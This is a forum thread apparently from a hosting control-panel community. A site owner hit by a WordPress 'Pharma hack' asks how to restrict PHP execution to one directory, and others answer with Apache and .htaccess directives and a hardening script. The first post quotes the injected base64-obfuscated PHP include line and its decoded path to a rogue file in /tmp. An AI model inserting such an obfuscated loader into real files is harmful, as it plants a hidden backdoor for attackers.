How to Prevent PHP from executing in directories you don't want it to run in

#1 Wed, 12/07/2011 - 20:58
katir


We are being hacked again: the old Pharma hack..

How do I stop PHP from executing in any directory except the WordPress installation, which is

/public_html/blog

??

These guys are inserting this into the top of lots of pages outside the /blog directory and I can't figure out how. I have changed passwords and examined all login logs and I see no suspicious activity. Lots of break-in attempts as usual, but all failed logins. Today we discovered in /blog/wp-content/themes/default/images/tmp/ hackers' files and 8000! yes, count 'em, 8000 *.html files which were copies of articles in WP with Pharma stuff at the top!

<?php
require_once(base64_decode("L3RtcC9JbWFnZU1hZ2ljay02LjQuNC9QZXJsTWFnaWNrL2xpYi92c3A="));

which is:

<?php include('/tmp/ImageMagick-6.4.4/PerlMagick/lib/bcp');
?>

This is bogus... it is there and it had a time stamp of 2008... our real ImageMagick is in /opt, which is the one we actually call and use. I just deleted it... and am continuing to clean the server... we may have to completely reinstall WP and be content to let all the archives go. If they have inserted stuff into an actual image, then I'm not sure how you could ever find that.

At any rate I looked through the WebMin options for PHP and also the VirtualMin options for specific domains and I don't see where to tweak a setting that prevents PHP from executing only in the /blog directory. We don't use PHP anywhere else (and never will!)

Wed, 12/07/2011 - 22:18
andreychek

Howdy,

If you're interested in setting one or more directories (and their subdirectories) so that PHP code doesn't execute in them -- you could always create a .htaccess file in that directory, and put something like this in it:

AddType text/plain .php

That would make all PHP code show up as plain text in the browser, rather than executing.

However, what you may want to do is look at the timestamps for your modified PHP files, and compare that to entries in $HOME/logs/access_log. That may assist you in determining who/what is responsible for the breach.

-Eric

Thu, 12/08/2011 - 09:11
stels88

Really, that is a bad idea to set

AddType text/plain .php

because visitors and hackers would be able to see the source of your php files, and for sure there will be a config file which would include mysql logins; as a result the database can be removed!

Better to block php files via htaccess as filetype!

Thu, 12/08/2011 - 17:04 (Reply to #3)
katir

"block php files by file type"

OK what would that directive look like?

We want to block execution of any php strings in all .html .shtml .txt files

Can it be added to the httpd.conf segment for a particular domain so that php only executes in

/public_html/blog

and nowhere else? Well, since /blog runs on *.php it should work if I can prevent execution in .html .shtml .txt files.

Sun, 12/25/2011 - 20:53
katir

@stels88

You suggested to stop PHP that is placed in .html or .shtml files to "block php files by file type"

What does the directive look like?

Since we have no PHP in any .html file that could expose the database or anything like that, Eric's directive would work. But if I put:

AddType text/plain .php

in the top .htaccess file

how do we then enable PHP in a lower directory /blog?

But, as it looks today, we are looking to upgrade the whole machine to the latest OS, latest PHP, etc. and harden security. As some said on another thread, we are just wasting our time picking at this since we really don't know where the vulnerability is, but still I would like to understand how PHP can be executed in .html files, and how to stop that.

Sun, 12/25/2011 - 22:12
andreychek

Well, technically, I don't think it can be by default.

Try creating a new file called "test.html", and in it, put this:

<?php
 phpinfo();
?>

If you then call that test.html in your browser, do you get a long PHP screen? Or do you just get the above line (or maybe even a blank page)?

-Eric

Mon, 12/26/2011 - 13:54
katir

Well, my symptoms indicate it is on (php strings execute from any file type) by default.

And, yes, testing is as you say a "no brainer" and I have already tested this, using the php date string call (a date inserted in the first line) and using php phpinfo() as you suggest: we get the entire screen for PHP ini displayed. So, that's the problem.

There are no rogue .htaccess file insertions containing: AddType application/x-httpd-php .html .shtml ( I grepped the whole server for any instance of this in a .htaccess file - came up with no output.)

But you say VirtualMin/WebMin does not activate PHP in html files by default... httpd.conf has not been modified since May of this year. The only customization I did then was to include DEFLATE several years ago. I don't know if this is a hole:

AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css text/javascript application/x-javascript application/x-httpd-php

The httpd.conf directives are all otherwise being "poked" from VirtualMin/WebMin..

things like this:

AddHandler fcgid-script .php
AddHandler fcgid-script .php5
FCGIWrapper /home/ling/fcgi-bin/php5.fcgi .php
FCGIWrapper /home/ling/fcgi-bin/php5.fcgi .php5

and

Options ExecCGI FollowSymLinks Includes Indexes
php_value memory_limit 64M
php_value safe_mode Off
php_value file_uploads On
php_value magic_quotes_gpc Off
php_value register_globals Off
RemoveHandler .php
RemoveHandler .php5
IPCCommTimeout 31

are all set from inside VirtualMin.. and I don't see anything anywhere that relates to the execution (or prevention of execution) of PHP in .html or .shtml files.

So, it appears to be activated by default..

Again: same question I asked from the beginning:

How do we simply "turn off" php execution in any files that do not end with ".php" ?

So my issue is: even if we do upgrade the machine to CentOS 6.2 (or whatever) and the latest PHP, and we change all our passwords and reinstall WordPress from the ground up and clean the WP database, I still feel like we might have a hole because I never found it in the first place... to "jail in" php to only execute in the WordPress directory (/public_html/blog/) is really one of the most important things we need to do.

I do see this as an option:

I could add a .htaccess file to every top level folder except /blog

OPTIONS -ExecCGI

but then my *.irev files may not run

On the web there are tons of references to enabling PHP in html files but not to preventing execution in html files....

still searching...
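One way to do what this thread keeps circling back to, as an added example that is not from the thread or from Virtualmin: a POSIX shell script that drops a PHP-disabling .htaccess into every top-level directory of a docroot except the one holding WordPress (the "blog" directory name and the DOCROOT/<dir>/ layout are assumptions), then lists .html/.shtml/.txt files that carry a PHP open tag, the pattern the first post found. It assumes Apache honours .htaccess overrides in that tree; under mod_php the engine flag stops PHP in any extension, while under fcgid only the extensions mapped to a handler ever execute, so the handler removal is what matters there.

```shell
#!/bin/sh
# Added example, not from the thread: confine PHP to one directory under a
# docroot, then scan the rest for injected PHP tags. Assumes AllowOverride
# permits .htaccess in the tree; the docroot layout is hypothetical.

# Write a .htaccess into DIR that stops PHP running there and below.
# RemoveHandler/RemoveType undo the fcgid or mod_php mappings for .php;
# php_flag only exists under mod_php, so it is guarded with IfModule
# (an unguarded php_flag under fcgid yields a 500 error). The FilesMatch
# block refuses to serve .php sources at all instead of leaking them as text.
deny_php_in() {
  dir=$1
  cat > "$dir/.htaccess" <<'EOF'
RemoveHandler .php .php5 .phtml
RemoveType .php .php5 .phtml
<IfModule mod_php5.c>
  php_flag engine off
</IfModule>
<FilesMatch "\.(php|php5|phtml)$">
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    Deny from all
  </IfModule>
</FilesMatch>
EOF
}

# Harden every top-level directory of DOCROOT except KEEP; print the count.
harden_docroot() {
  docroot=$1; keep=$2; n=0
  for d in "$docroot"/*/; do
    d=${d%/}
    [ "$(basename "$d")" = "$keep" ] && continue
    deny_php_in "$d"
    n=$((n + 1))
  done
  echo "$n"
}

# Detection: list .html/.shtml/.txt files under DIR that contain a PHP open
# tag, the shape of the injected pages described in the first post.
find_injected_php() {
  find "$1" -type f \( -name '*.html' -o -name '*.shtml' -o -name '*.txt' \) \
    -exec grep -l '<?php' {} + 2>/dev/null
}
```

Run harden_docroot against the account's public_html and review find_injected_php output before deleting anything, since a hit is a file to inspect, not proof of compromise by itself.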
